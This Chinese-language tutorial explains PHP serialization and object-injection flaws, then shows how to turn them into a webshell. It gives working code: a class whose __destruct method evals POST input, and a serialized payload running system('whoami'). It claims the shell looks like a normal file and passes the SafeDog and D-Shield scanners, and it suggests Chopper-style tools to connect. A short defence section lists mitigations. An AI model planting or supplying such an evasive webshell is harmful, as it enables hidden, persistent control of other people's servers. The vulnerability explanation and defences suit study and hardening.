PHP反序列化漏洞与Webshell利用详解<\/h1>

1. PHP序列化与反序列化基础<\/h2>

1.1 序列化概念<\/h3>
PHP序列化是将对象、数组、字符串等数据结构转换为字节流的过程，便于传输或存储。序列化不会保存对象的方法，只保存属性。<\/p>
class<\/span> A<\/span>{
<\/span><\/span>    var<\/span> $test =<\/span> "demo"<\/span>;
<\/span><\/span>}
<\/span><\/span>$a =<\/span> new<\/span> A<\/span>(); \/\/ 生成a对象
<\/span><\/span><\/span><\/span>$b =<\/span> serialize<\/span>($a); \/\/ 序列化a对象为b
<\/span><\/span><\/span><\/span>print_r<\/span>($b); \/\/ 输出:O:1:"A":1:{s:4:"test";s:4:"demo";}
<\/span><\/span><\/span><\/code><\/pre>1.2 反序列化概念<\/h3>
反序列化是将序列化后的字节流还原为原始数据结构的过程：<\/p>
$c =<\/span> unserialize<\/span>($b); \/\/ 反序列化b对象为c
<\/span><\/span><\/span><\/span>print_r<\/span>($c-><\/span>test<\/span>); \/\/ 输出:demo
<\/span><\/span><\/span><\/code><\/pre>2. PHP反序列化漏洞原理<\/h2>
2.1 魔法函数(Magic Methods)<\/h3>
PHP类中的特殊函数，以__<\/code>开头，在特定情况下自动调用：<\/p>

__construct()<\/code>: 对象创建时调用<\/li>
__destruct()<\/code>: 对象销毁时调用<\/li>
__toString()<\/code>: 对象被当作字符串使用时调用<\/li>
__sleep()<\/code>: 序列化前调用<\/li>
__wakeup()<\/code>: 反序列化后调用<\/li>
<\/ul>
2.2 漏洞产生条件<\/h3>
当反序列化用户可控的数据，且类中存在魔法函数时，可能触发对象注入漏洞：<\/p>
class<\/span> A<\/span>{
<\/span><\/span>    var<\/span> $test =<\/span> "demo"<\/span>;
<\/span><\/span>    function<\/span> __destruct(){
<\/span><\/span>        echo<\/span> $this-><\/span>test<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>$a =<\/span> $_GET['test'<\/span>];
<\/span><\/span>$a_unser =<\/span> unserialize<\/span>($a);
<\/span><\/span><\/code><\/pre>构造payload：<\/p>
http:\/\/127.0.0.1:800\/test.php?test=O:1:"A":1:{s:4:"test";s:5:"hello";}
<\/code><\/pre>
反序列化后会输出"hello"，因为__destruct()<\/code>被触发。<\/p>
3. 利用反序列化构造Webshell<\/h2>
3.1 基本Webshell构造<\/h3>
通过控制输入变量，构造序列化对象，在魔法函数中执行恶意代码：<\/p>
class<\/span> A<\/span>{
<\/span><\/span>    var<\/span> $test =<\/span> "demo"<\/span>;
<\/span><\/span>    function<\/span> __destruct(){
<\/span><\/span>        @<\/span>eval<\/span>($this-><\/span>test<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>$test =<\/span> $_POST['test'<\/span>];
<\/span><\/span>$len =<\/span> strlen<\/span>($test)+<\/span>1<\/span>;
<\/span><\/span>$pp =<\/span> "O:1:<\/span>\"<\/span>A<\/span>\"<\/span>:1:{s:4:<\/span>\"<\/span>test<\/span>\"<\/span>;s:"<\/span>.<\/span>$len.<\/span>":<\/span>\"<\/span>"<\/span>.<\/span>$test.<\/span>"<\/span>\"<\/span>;}"<\/span>;
<\/span><\/span>$test_unser =<\/span> unserialize<\/span>($pp); \/\/ 反序列化触发__destruct
<\/span><\/span><\/span><\/code><\/pre>3.2 利用方式<\/h3>


直接通过POST提交PHP代码：<\/p>
system<\/span>('whoami'<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

构造序列化payload：<\/p>
O:1:"A":1:{s:4:"test";s:17:"system('whoami');";}
<\/code><\/pre>
<\/li>

通过菜刀等工具连接<\/p>
<\/li>
<\/ol>
3.3 免杀特性<\/h3>
这种Webshell与正常文件相似，具有较好的免杀效果：<\/p>

安全狗：测试通过<\/li>
D盾：测试通过<\/li>
其他安全设备需自行测试<\/li>
<\/ul>
4. 漏洞防御措施<\/h2>
4.1 开发层面<\/h3>

避免反序列化用户可控的数据<\/li>
对反序列化数据进行严格过滤<\/li>
使用json_encode()<\/code>\/json_decode()<\/code>替代序列化<\/li>
<\/ol>
4.2 安全配置<\/h3>

禁用危险函数：eval()<\/code>, system()<\/code>, exec()<\/code>等<\/li>
配置open_basedir<\/code>限制文件访问范围<\/li>
及时更新PHP版本，修复已知漏洞<\/li>
<\/ol>
5. 扩展利用思路<\/h2>

结合其他漏洞（如文件上传、SQL注入）作为载体<\/li>
利用其他魔法函数（如__wakeup()<\/code>、__toString()<\/code>）<\/li>
构造链式调用（POP链）实现复杂攻击<\/li>
<\/ol>
6. 总结<\/h2>
PHP反序列化漏洞通过精心构造的序列化数据，在反序列化过程中触发魔法函数执行恶意代码，可以用于构造隐蔽性较强的Webshell。防御此类漏洞需要开发者提高安全意识，避免反序列化不可信数据，并做好输入过滤。<\/p>